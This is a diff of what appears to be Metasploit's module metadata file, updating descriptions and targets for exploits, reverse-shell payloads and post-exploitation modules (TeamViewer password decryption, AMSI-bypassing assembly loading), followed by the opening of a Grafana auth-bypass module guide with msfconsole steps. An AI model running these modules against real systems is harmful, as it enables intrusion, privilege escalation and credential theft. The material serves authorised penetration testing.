-    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n        is handled.  When the lpApplicationName contains a space, the file name is\n        ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n        The Windows API will try to interpret this as two possible paths:\n        C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n        To some software developers, this is an unexpected behavior, which becomes a\n        security problem if an attacker is able to place a malicious executable in one\n        of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n        Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n        same problem.\n\n        The offensive technique is also described in Writing Secure Code (2nd Edition),\n        Chapter 23, in the section \"Calling Processes Security\" on page 676.",
+    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n        is handled.  When the lpApplicationName contains a space, the file name is\n        ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n        The Windows API will try to interpret this as two possible paths:\n        C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n        To some software developers, this is an unexpected behavior, which becomes a\n        security problem if an attacker is able to place a malicious executable in one\n        of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n        Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n        same problem.\n\n        The offensive technique is also described in Writing Secure Code (2nd Edition),\n        Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n        This technique was previously called Trusted Service Path, but is more commonly\n        known as Unquoted Service Path.\n\n        The service exploited won't start until the payload written to disk is removed.\n        Manual cleanup is required.",
     "references": [
       "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx",
-      "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us"
+      "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us",
+      "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae"
     ],
     "platform": "Windows",
     "arch": "",
@@ -131404,14 +133341,24 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/exploits/windows/local/trusted_service_path.rb",
+    "mod_time": "2020-04-11 12:47:53 +0000",
+    "path": "/modules/exploits/windows/local/unquoted_service_path.rb",
     "is_install_path": true,
-    "ref_name": "windows/local/trusted_service_path",
+    "ref_name": "windows/local/unquoted_service_path",
     "check": true,
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
     },
     "needs_cleanup": true
   },
@@ -131571,7 +133518,7 @@
       "Windows x86",
       "Windows x64"
     ],
-    "mod_time": "2018-10-24 16:13:47 +0000",
+    "mod_time": "2020-05-08 14:49:01 +0000",
     "path": "/modules/exploits/windows/local/webexec.rb",
     "is_install_path": true,
     "ref_name": "windows/local/webexec",
@@ -131613,7 +133560,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2020-02-01 00:41:07 +0000",
+    "mod_time": "2020-05-08 14:49:01 +0000",
     "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
@@ -136371,13 +138318,15 @@
     "disclosure_date": "2007-05-14",
     "type": "exploit",
     "author": [
+      "Maarten Boone",
       "Jacopo Cervini <acaro@jervus.it>"
     ],
-    "description": "This module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n        If we send a long string to the ident service we can overwrite the return\n        address and execute arbitrary code. Credit to Maarten Boone.",
+    "description": "This module exploits a stack based buffer overflow in TinyIdentD\n          version 2.2.\n          If we send a long string to the ident service we can overwrite the\n          return address and execute arbitrary code. Credit to Maarten Boone.",
     "references": [
+      "BID-23981",
       "CVE-2007-2711",
-      "OSVDB-36053",
-      "BID-23981"
+      "EDB-3925",
+      "OSVDB-36053"
     ],
     "platform": "Windows",
     "arch": "",
@@ -136390,10 +138339,15 @@
     ],
     "targets": [
       "Automatic",
-      "Windows 2000 Server SP4 English",
-      "Windows XP SP2 Italian"
+      "Windows 2000 Server SP4 - English",
+      "Windows 2000 Pro All - English",
+      "Windows 2000 Pro All - Italian",
+      "Windows 2000 Pro All - French",
+      "Windows XP SP0/1 - English",
+      "Windows XP SP2 - English",
+      "Windows XP SP2 - Italian"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-23 04:43:44 +0000",
     "path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/tiny_identd_overflow",
@@ -136401,6 +138355,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ]
     },
     "needs_cleanup": null
   },
@@ -136487,6 +138447,63 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/misc/veeam_one_agent_deserialization": {
+    "name": "Veeam ONE Agent .NET Deserialization",
+    "fullname": "exploit/windows/misc/veeam_one_agent_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-15",
+    "type": "exploit",
+    "author": [
+      "Michael Zanetta",
+      "Edgar Boda-Majer",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a .NET deserialization vulnerability in the Veeam\n          ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the\n          9 and 10 release lines.\n\n          Specifically, the module targets the HandshakeResult() method used by\n          the Agent. By inducing a failure in the handshake, the Agent will\n          deserialize untrusted data.\n\n          Tested against the pre-patched release of 10.0.0.750. Note that Veeam\n          continues to distribute this version but with the patch pre-applied.",
+    "references": [
+      "CVE-2020-10914",
+      "CVE-2020-10915",
+      "ZDI-20-545",
+      "ZDI-20-546",
+      "URL-https://www.veeam.com/kb3144"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 2805,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows Command",
+      "Windows Dropper",
+      "PowerShell Stager"
+    ],
+    "mod_time": "2020-05-01 12:59:01 +0000",
+    "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/veeam_one_agent_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/misc/vmhgfs_webdav_dll_sideload": {
     "name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector",
     "fullname": "exploit/windows/misc/vmhgfs_webdav_dll_sideload",
@@ -138578,7 +140595,7 @@
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
     ],
-    "mod_time": "2020-01-12 08:19:44 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
     "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -141335,7 +143352,7 @@
     "targets": [
       "Windows 7 and Server 2008 R2 (x64) All Service Packs"
     ],
-    "mod_time": "2020-03-09 09:22:01 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
     "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -141444,7 +143461,7 @@
       "Native upload",
       "MOF upload"
     ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-05-14 16:41:54 +0000",
     "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms17_010_psexec",
@@ -141545,7 +143562,7 @@
       "Native upload",
       "MOF upload"
     ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-14 16:41:54 +0000",
     "path": "/modules/exploits/windows/smb/psexec.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/psexec",
@@ -142547,7 +144564,7 @@
       "Windows 2000 Pro English All",
       "Windows XP Pro SP0/SP1 English"
     ],
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-04-16 02:04:17 +0000",
     "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
     "is_install_path": true,
     "ref_name": "windows/telnet/goodtech_telnet",
@@ -142624,7 +144641,7 @@
       "modpr0be",
       "sinn3r <sinn3r@metasploit.com>"
     ],
-    "description": "This module exploits a vulnerability found in Distinct TFTP server.  The\n        software contains a directory traversal vulnerability that allows a remote\n        attacker to write arbitrary file to the file system, which results in\n        code execution under the context of 'SYSTEM'.",
+    "description": "This module exploits a directory traversal vulnerability in the TFTP\n          Server component of Distinct Intranet Servers version 3.10 which\n          allows a remote attacker to write arbitrary files to the server file\n          system, resulting in code execution under the context of 'SYSTEM'.\n          This module has been tested successfully on TFTP Server version 3.10\n          on Windows XP SP3 (EN).",
     "references": [
       "OSVDB-80984",
       "EDB-18718",
@@ -142641,9 +144658,9 @@
 
     ],
     "targets": [
-      "Distinct TFTP 3.10 on Windows"
+      "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-14 05:22:36 +0000",
     "path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb",
     "is_install_path": true,
     "ref_name": "windows/tftp/distinct_tftp_traversal",
@@ -142652,7 +144669,7 @@
     "default_credential": false,
     "notes": {
     },
-    "needs_cleanup": null
+    "needs_cleanup": true
   },
   "exploit_windows/tftp/dlink_long_filename": {
     "name": "D-Link TFTP 1.0 Long Filename Buffer Overflow",
@@ -146792,7 +148809,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-10-13 17:04:00 +0000",
+    "mod_time": "2020-04-16 15:35:38 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_python",
@@ -146825,7 +148842,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-06-25 20:42:35 +0000",
+    "mod_time": "2020-04-16 16:03:14 +0000",
     "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/reverse_python_ssl",
@@ -152701,7 +154718,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-01-10 15:06:08 +0000",
+    "mod_time": "2020-03-11 18:02:51 +0000",
     "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/dupandexecve/reverse_tcp",
@@ -152712,6 +154729,40 @@
     },
     "needs_cleanup": false
   },
+  "payload_osx/x64/dupandexecve/reverse_tcp_uuid": {
+    "name": "OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)",
+    "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "nemo",
+      "timwr"
+    ],
+    "description": "dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 16:34:01 +0000",
+    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "osx/x64/dupandexecve/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "payload_osx/x64/exec": {
     "name": "OS X x64 Execute Command",
     "fullname": "payload/osx/x64/exec",
@@ -152809,7 +154860,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-01-10 15:06:08 +0000",
+    "mod_time": "2020-03-11 18:02:51 +0000",
     "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/meterpreter/reverse_tcp",
@@ -152820,6 +154871,42 @@
     },
     "needs_cleanup": false
   },
+  "payload_osx/x64/meterpreter/reverse_tcp_uuid": {
+    "name": "OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)",
+    "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "parchedmind",
+      "nologic",
+      "timwr"
+    ],
+    "description": "Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)",
+    "references": [
+      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
+      "URL-https://github.com/nologic/shellcc"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 16:34:01 +0000",
+    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "payload_osx/x64/meterpreter_reverse_http": {
     "name": "OSX Meterpreter, Reverse HTTP Inline",
     "fullname": "payload/osx/x64/meterpreter_reverse_http",
@@ -154012,7 +156099,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/bind_tcp",
@@ -154046,7 +156133,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/bind_tcp_uuid",
@@ -154079,7 +156166,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_http",
@@ -154112,7 +156199,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_https",
@@ -154145,7 +156232,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_tcp",
@@ -154180,7 +156267,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_tcp_ssl",
@@ -154214,7 +156301,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter/reverse_tcp_uuid",
@@ -154247,7 +156334,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-02-11 15:41:04 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_bind_tcp",
@@ -154280,7 +156367,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_http",
@@ -154313,7 +156400,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_https",
@@ -154346,7 +156433,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-02-11 15:41:04 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
     "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "python/meterpreter_reverse_tcp",
@@ -157164,7 +159251,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-03 18:25:26 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -157199,7 +159286,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-03 18:25:26 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_bind_tcp",
@@ -157234,7 +159321,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_http",
@@ -157269,7 +159356,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_https",
@@ -157304,7 +159391,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-03 18:25:26 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -157339,7 +159426,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-03 18:25:26 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/meterpreter_reverse_tcp",
@@ -162017,7 +164104,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-15 17:37:33 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -162052,7 +164139,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-15 17:37:33 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -162087,7 +164174,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_reverse_http",
@@ -162122,7 +164209,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-09-23 08:45:43 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_reverse_https",
@@ -162157,7 +164244,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-15 17:37:33 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -162192,7 +164279,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-02-15 17:37:33 +0000",
+    "mod_time": "2020-04-24 12:02:45 +0000",
     "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -164630,7 +166717,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-12-07 14:42:16 +0000",
+    "mod_time": "2020-04-26 21:26:52 +0000",
     "path": "/modules/post/linux/gather/enum_protections.rb",
     "is_install_path": true,
     "ref_name": "linux/gather/enum_protections",
@@ -166561,7 +168648,7 @@
       "zhangyoufu",
       "justingist"
     ],
-    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.",
+    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n        If the zip can be repaired, the db and its information will be extracted.",
     "references": [
       "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/",
       "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1",
@@ -166574,7 +168661,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2019-05-14 15:54:44 +0000",
+    "mod_time": "2020-03-21 11:00:25 +0000",
     "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb",
     "is_install_path": true,
     "ref_name": "multi/gather/ubiquiti_unifi_backup",
@@ -167021,6 +169108,39 @@
     },
     "needs_cleanup": null
   },
+  "post_multi/manage/screenshare": {
+    "name": "Multi Manage the screen of the target meterpreter session",
+    "fullname": "post/multi/manage/screenshare",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "timwr"
+    ],
+    "description": "This module allows you to view and control the screen of the target computer via\n          a local browser window. The module continually screenshots the target screen and\n          also relays all mouse and keyboard events to session.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 18:50:05 +0000",
+    "path": "/modules/post/multi/manage/screenshare.rb",
+    "is_install_path": true,
+    "ref_name": "multi/manage/screenshare",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_multi/manage/set_wallpaper": {
     "name": "Multi Manage Set Wallpaper",
     "fullname": "post/multi/manage/set_wallpaper",
@@ -168645,6 +170765,39 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/gather/bloodhound": {
+    "name": "BloodHound Ingestor",
+    "fullname": "post/windows/gather/bloodhound",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h4ng3r <h4ng3r@computerpirate.me>"
+    ],
+    "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2018-10-16 17:53:02 +0000",
+    "path": "/modules/post/windows/gather/bloodhound.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/bloodhound",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/gather/cachedump": {
     "name": "Windows Gather Credential Cache Dump",
     "fullname": "post/windows/gather/cachedump",
@@ -169976,12 +172129,14 @@
     "disclosure_date": null,
     "type": "post",
     "author": [
-      "Nic Losby <blurbdust@gmail.com>"
+      "Nic Losby <blurbdust@gmail.com>",
+      "Kali-Team <kali-team@qq.com>"
     ],
     "description": "This module will find and decrypt stored TeamViewer passwords",
     "references": [
       "CVE-2019-18988",
-      "URL-https://whynotsecurity.com/blog/teamviewer/"
+      "URL-https://whynotsecurity.com/blog/teamviewer/",
+      "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html"
     ],
     "platform": "Windows",
     "arch": "",
@@ -169989,7 +172144,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-02-07 10:07:41 +0000",
+    "mod_time": "2020-04-16 02:04:17 +0000",
     "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
     "is_install_path": true,
     "ref_name": "windows/gather/credentials/teamviewer_passwords",
@@ -172905,6 +175060,39 @@
     },
     "needs_cleanup": null
   },
+  "post_windows/manage/execute_dotnet_assembly": {
+    "name": "Execute .net Assembly (x64 only)",
+    "fullname": "post/windows/manage/execute_dotnet_assembly",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "b4rtik"
+    ],
+    "description": "This module executes a .net assembly in memory. It\n          reflectively loads a dll that will host CLR, then it copies\n          the assembly to be executed into memory. Credits for Amsi\n          bypass to Rastamouse (@_RastaMouse)",
+    "references": [
+      "URL-https://b4rtik.blogspot.com/2018/12/execute-assembly-via-meterpreter-session.html"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-05-01 13:47:17 +0000",
+    "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/execute_dotnet_assembly",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "post_windows/manage/forward_pageant": {
     "name": "Forward SSH Agent Requests To Remote Pageant",
     "fullname": "post/windows/manage/forward_pageant",
@@ -173998,7 +176186,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/post/windows/manage/sticky_keys.rb",
     "is_install_path": true,
     "ref_name": "windows/manage/sticky_keys",

documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md

@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+The following list shows the vulnerable versions of Grafana when configured for LDAP or OAuth:
+
+  1.  2.x 
+  2.  3.x
+  3.  4.x befroe 4.6.4
+  4.  5.x before 5.2.3
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ``use auxiliary/admin/http/grafana_auth_bypass``
+  3. Do: ``set username <username>`` or ``set cookie <cookie>`` 
+  5. Do: ``set version``
+  6. Do: ``set rhosts``
+  7. Do: ``set rport``
+  8. Do: ``run``
+
+## Scenarios
+
+  Example run against Grafana 3.x with username admin:
+
+```
+msf5 > use auxiliary/admin/http/grafana_auth_bypass 
+msf5 auxiliary(admin/http/grafana_auth_bypass) > show options 
+
+Module options (auxiliary/admin/http/grafana_auth_bypass):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   COOKIE                      no        Decrypt captured cookie
+   RHOSTS     127.0.0.1        yes       Address of target
+   RPORT      3000             yes       Port of target
+   SSL        false            yes       set SSL/TLS based connection
+   TARGETURI  /                no        Base URL of grafana instance
+   THREADS    1                yes       The number of concurrent threads
+   USERNAME                    no        Valid username
+   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
+
+msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
+RHOSTS => 192.168.202.3
